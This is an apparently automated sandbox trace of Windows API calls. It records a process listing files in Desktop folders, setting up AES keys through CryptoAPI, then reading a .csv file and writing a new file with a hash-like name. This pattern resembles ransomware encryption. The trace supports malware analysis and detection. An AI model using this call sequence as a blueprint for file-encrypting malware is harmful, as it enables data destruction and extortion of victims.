ftCreationTime.dwHighDateTime=0x1d4c6af, ftLastAccessTime.dwLowDateTime=0xca121730, ftLastAccessTime.dwHighDateTime=0x1d4ce91, ftLastWriteTime.dwLowDateTime=0xca121730, ftLastWriteTime.dwHighDateTime=0x1d4ce91, nFileSizeHigh=0x0, nFileSizeLow=0x2d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="o8eV5I6XIe2.bmp", cAlternateFileName="O8EV5I~1.BMP")) returned 1 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd199c00, ftCreationTime.dwHighDateTime=0x1d4c940, ftLastAccessTime.dwLowDateTime=0xd416d010, ftLastAccessTime.dwHighDateTime=0x1d4d10a, ftLastWriteTime.dwLowDateTime=0xd416d010, ftLastWriteTime.dwHighDateTime=0x1d4d10a, nFileSizeHigh=0x0, nFileSizeLow=0x155fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="unLq0PVCk_RlQ.m4a", cAlternateFileName="UNLQ0P~1.M4A")) returned 1 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac13ea60, ftCreationTime.dwHighDateTime=0x1d4cbc1, ftLastAccessTime.dwLowDateTime=0xb438b6f0, ftLastAccessTime.dwHighDateTime=0x1d4cdfe, ftLastWriteTime.dwLowDateTime=0xb438b6f0, ftLastWriteTime.dwHighDateTime=0x1d4cdfe, nFileSizeHigh=0x0, nFileSizeLow=0x8a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZLHv.bmp", cAlternateFileName="")) returned 1 [0071.001] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0071.001] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0071.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0071.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0071.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG", lpFilePart=0x0) returned 0x35 [0071.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\", lpFilePart=0x0) returned 0x36 [0071.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.001] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.001] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfc9fc0, ftCreationTime.dwHighDateTime=0x1d4c7cf, ftLastAccessTime.dwLowDateTime=0x89ac1bc0, ftLastAccessTime.dwHighDateTime=0x1d4d20e, ftLastWriteTime.dwLowDateTime=0x89ac1bc0, ftLastWriteTime.dwHighDateTime=0x1d4d20e, nFileSizeHigh=0x0, nFileSizeLow=0x1303, dwReserved0=0x0, dwReserved1=0x0, cFileName="ALHCi.gif", cAlternateFileName="")) returned 1 [0071.002] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNCF5miF", cAlternateFileName="")) returned 1 [0071.002] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e9010, ftCreationTime.dwHighDateTime=0x1d4c6af, ftLastAccessTime.dwLowDateTime=0xca121730, ftLastAccessTime.dwHighDateTime=0x1d4ce91, ftLastWriteTime.dwLowDateTime=0xca121730, ftLastWriteTime.dwHighDateTime=0x1d4ce91, nFileSizeHigh=0x0, nFileSizeLow=0x2d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="o8eV5I6XIe2.bmp", cAlternateFileName="O8EV5I~1.BMP")) returned 1 [0071.002] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd199c00, ftCreationTime.dwHighDateTime=0x1d4c940, ftLastAccessTime.dwLowDateTime=0xd416d010, ftLastAccessTime.dwHighDateTime=0x1d4d10a, ftLastWriteTime.dwLowDateTime=0xd416d010, ftLastWriteTime.dwHighDateTime=0x1d4d10a, nFileSizeHigh=0x0, nFileSizeLow=0x155fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="unLq0PVCk_RlQ.m4a", cAlternateFileName="UNLQ0P~1.M4A")) returned 1 [0071.002] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac13ea60, ftCreationTime.dwHighDateTime=0x1d4cbc1, ftLastAccessTime.dwLowDateTime=0xb438b6f0, ftLastAccessTime.dwHighDateTime=0x1d4cdfe, ftLastWriteTime.dwLowDateTime=0xb438b6f0, ftLastWriteTime.dwHighDateTime=0x1d4cdfe, nFileSizeHigh=0x0, nFileSizeLow=0x8a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZLHv.bmp", cAlternateFileName="")) returned 1 [0071.002] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac13ea60, ftCreationTime.dwHighDateTime=0x1d4cbc1, ftLastAccessTime.dwLowDateTime=0xb438b6f0, ftLastAccessTime.dwHighDateTime=0x1d4cdfe, ftLastWriteTime.dwLowDateTime=0xb438b6f0, ftLastWriteTime.dwHighDateTime=0x1d4cdfe, nFileSizeHigh=0x0, nFileSizeLow=0x8a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZLHv.bmp", cAlternateFileName="")) returned 0 [0071.002] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0071.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0071.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c980) returned 1 [0071.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF", nBufferLength=0x105, lpBuffer=0x1bf5c470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF", lpFilePart=0x0) returned 0x3e [0071.003] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\", nBufferLength=0x105, lpBuffer=0x1bf5c410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\", lpFilePart=0x0) returned 0x3f [0071.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\*", lpFindFileData=0x1bf5c620 | out: lpFindFileData=0x1bf5c620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.003] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeddb1900, ftCreationTime.dwHighDateTime=0x1d4ced2, ftLastAccessTime.dwLowDateTime=0xd5683060, ftLastAccessTime.dwHighDateTime=0x1d4c824, ftLastWriteTime.dwLowDateTime=0xd5683060, ftLastWriteTime.dwHighDateTime=0x1d4c824, nFileSizeHigh=0x0, nFileSizeLow=0x5941, dwReserved0=0x0, dwReserved1=0x0, cFileName="b lINlk.m4a", cAlternateFileName="BLINLK~1.M4A")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb96f4d0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x6820ed50, ftLastAccessTime.dwHighDateTime=0x1d4d10f, ftLastWriteTime.dwLowDateTime=0x6820ed50, ftLastWriteTime.dwHighDateTime=0x1d4d10f, nFileSizeHigh=0x0, nFileSizeLow=0xcbd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV5tp3PFjr.csv", cAlternateFileName="GV5TP3~1.CSV")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6483eef0, ftCreationTime.dwHighDateTime=0x1d4cfe7, ftLastAccessTime.dwLowDateTime=0xe0464eb0, ftLastAccessTime.dwHighDateTime=0x1d4d524, ftLastWriteTime.dwLowDateTime=0xe0464eb0, ftLastWriteTime.dwHighDateTime=0x1d4d524, nFileSizeHigh=0x0, nFileSizeLow=0x10965, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hrg-XXlvr_zhlnDnpPpX.flv", cAlternateFileName="HRG-XX~1.FLV")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e709e30, ftCreationTime.dwHighDateTime=0x1d4d149, ftLastAccessTime.dwLowDateTime=0x7a62a470, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x7a62a470, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0xd677, dwReserved0=0x0, dwReserved1=0x0, cFileName="r0xX_-uxKbNvTBm.png", cAlternateFileName="R0XX_-~1.PNG")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17004cd0, ftCreationTime.dwHighDateTime=0x1d4d296, ftLastAccessTime.dwLowDateTime=0x83e2f8d0, ftLastAccessTime.dwHighDateTime=0x1d4cfd9, ftLastWriteTime.dwLowDateTime=0x83e2f8d0, ftLastWriteTime.dwHighDateTime=0x1d4cfd9, nFileSizeHigh=0x0, nFileSizeLow=0x3f74, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReJnQbvF6.mkv", cAlternateFileName="REJNQB~1.MKV")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31c19a0, ftCreationTime.dwHighDateTime=0x1d4d2af, ftLastAccessTime.dwLowDateTime=0x18d20ea0, ftLastAccessTime.dwHighDateTime=0x1d4d39e, ftLastWriteTime.dwLowDateTime=0x18d20ea0, ftLastWriteTime.dwHighDateTime=0x1d4d39e, nFileSizeHigh=0x0, nFileSizeLow=0xc915, dwReserved0=0x0, dwReserved1=0x0, cFileName="wbCkVduqg MHOpG8.bmp", cAlternateFileName="WBCKVD~1.BMP")) returned 1 [0071.004] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0071.004] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c8d0) returned 1 [0071.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c890) returned 1 [0071.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c980) returned 1 [0071.005] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF", nBufferLength=0x105, lpBuffer=0x1bf5c470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF", lpFilePart=0x0) returned 0x3e [0071.005] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\", nBufferLength=0x105, lpBuffer=0x1bf5c410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\", lpFilePart=0x0) returned 0x3f [0071.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\*", lpFindFileData=0x1bf5c620 | out: lpFindFileData=0x1bf5c620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.005] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.005] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeddb1900, ftCreationTime.dwHighDateTime=0x1d4ced2, ftLastAccessTime.dwLowDateTime=0xd5683060, ftLastAccessTime.dwHighDateTime=0x1d4c824, ftLastWriteTime.dwLowDateTime=0xd5683060, ftLastWriteTime.dwHighDateTime=0x1d4c824, nFileSizeHigh=0x0, nFileSizeLow=0x5941, dwReserved0=0x0, dwReserved1=0x0, cFileName="b lINlk.m4a", cAlternateFileName="BLINLK~1.M4A")) returned 1 [0071.005] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb96f4d0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x6820ed50, ftLastAccessTime.dwHighDateTime=0x1d4d10f, ftLastWriteTime.dwLowDateTime=0x6820ed50, ftLastWriteTime.dwHighDateTime=0x1d4d10f, nFileSizeHigh=0x0, nFileSizeLow=0xcbd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV5tp3PFjr.csv", cAlternateFileName="GV5TP3~1.CSV")) returned 1 [0071.005] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6483eef0, ftCreationTime.dwHighDateTime=0x1d4cfe7, ftLastAccessTime.dwLowDateTime=0xe0464eb0, ftLastAccessTime.dwHighDateTime=0x1d4d524, ftLastWriteTime.dwLowDateTime=0xe0464eb0, ftLastWriteTime.dwHighDateTime=0x1d4d524, nFileSizeHigh=0x0, nFileSizeLow=0x10965, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hrg-XXlvr_zhlnDnpPpX.flv", cAlternateFileName="HRG-XX~1.FLV")) returned 1 [0071.006] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e709e30, ftCreationTime.dwHighDateTime=0x1d4d149, ftLastAccessTime.dwLowDateTime=0x7a62a470, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x7a62a470, ftLastWriteTime.dwHighDateTime=0x1d4cd5b, nFileSizeHigh=0x0, nFileSizeLow=0xd677, dwReserved0=0x0, dwReserved1=0x0, cFileName="r0xX_-uxKbNvTBm.png", cAlternateFileName="R0XX_-~1.PNG")) returned 1 [0071.006] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17004cd0, ftCreationTime.dwHighDateTime=0x1d4d296, ftLastAccessTime.dwLowDateTime=0x83e2f8d0, ftLastAccessTime.dwHighDateTime=0x1d4cfd9, ftLastWriteTime.dwLowDateTime=0x83e2f8d0, ftLastWriteTime.dwHighDateTime=0x1d4cfd9, nFileSizeHigh=0x0, nFileSizeLow=0x3f74, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReJnQbvF6.mkv", cAlternateFileName="REJNQB~1.MKV")) returned 1 [0071.006] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31c19a0, ftCreationTime.dwHighDateTime=0x1d4d2af, ftLastAccessTime.dwLowDateTime=0x18d20ea0, ftLastAccessTime.dwHighDateTime=0x1d4d39e, ftLastWriteTime.dwLowDateTime=0x18d20ea0, ftLastWriteTime.dwHighDateTime=0x1d4d39e, nFileSizeHigh=0x0, nFileSizeLow=0xc915, dwReserved0=0x0, dwReserved1=0x0, cFileName="wbCkVduqg MHOpG8.bmp", cAlternateFileName="WBCKVD~1.BMP")) returned 1 [0071.006] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5c670 | out: lpFindFileData=0x1bf5c670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31c19a0, ftCreationTime.dwHighDateTime=0x1d4d2af, ftLastAccessTime.dwLowDateTime=0x18d20ea0, ftLastAccessTime.dwHighDateTime=0x1d4d39e, ftLastWriteTime.dwLowDateTime=0x18d20ea0, ftLastWriteTime.dwHighDateTime=0x1d4d39e, nFileSizeHigh=0x0, nFileSizeLow=0xc915, dwReserved0=0x0, dwReserved1=0x0, cFileName="wbCkVduqg MHOpG8.bmp", cAlternateFileName="WBCKVD~1.BMP")) returned 0 [0071.006] FindClose (in: hFindFile=0x1a5de0f0 | out: hFindFile=0x1a5de0f0) returned 1 [0071.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c8d0) returned 1 [0071.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c890) returned 1 [0071.006] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.008] CryptAcquireContextW (in: phProv=0x1bf5c868, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5c868*=0x1a5b7910) returned 1 [0071.008] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2280540, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5c820 | out: phKey=0x1bf5c820*=0x1a626bb0) returned 1 [0071.008] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.008] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5c930 | out: pbData=0x0*, pdwDataLen=0x1bf5c930*=0x1c) returned 1 [0071.009] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2280630, pdwDataLen=0x1bf5c930 | out: pbData=0x2280630*, pdwDataLen=0x1bf5c930*=0x1c) returned 1 [0071.009] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2280750, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5c7f0 | out: phKey=0x1bf5c7f0*=0x1a626a60) returned 1 [0071.009] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.009] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.009] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5c7e0 | out: phKey=0x1bf5c7e0*=0x1a626d70) returned 1 [0071.009] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0071.009] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x4, pbData=0x2280898*=0x1, dwFlags=0x0) returned 1 [0071.009] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x1, pbData=0x2280848, dwFlags=0x0) returned 1 [0071.009] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0071.009] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0071.009] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c730) returned 1 [0071.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.009] GetFileType (hFile=0x384) returned 0x1 [0071.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6a0) returned 1 [0071.009] GetFileType (hFile=0x384) returned 0x1 [0071.009] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", nBufferLength=0x105, lpBuffer=0x1bf5c250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", lpFilePart=0x0) returned 0x5f [0071.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c730) returned 1 [0071.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x300 [0071.010] GetFileType (hFile=0x300) returned 0x1 [0071.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6a0) 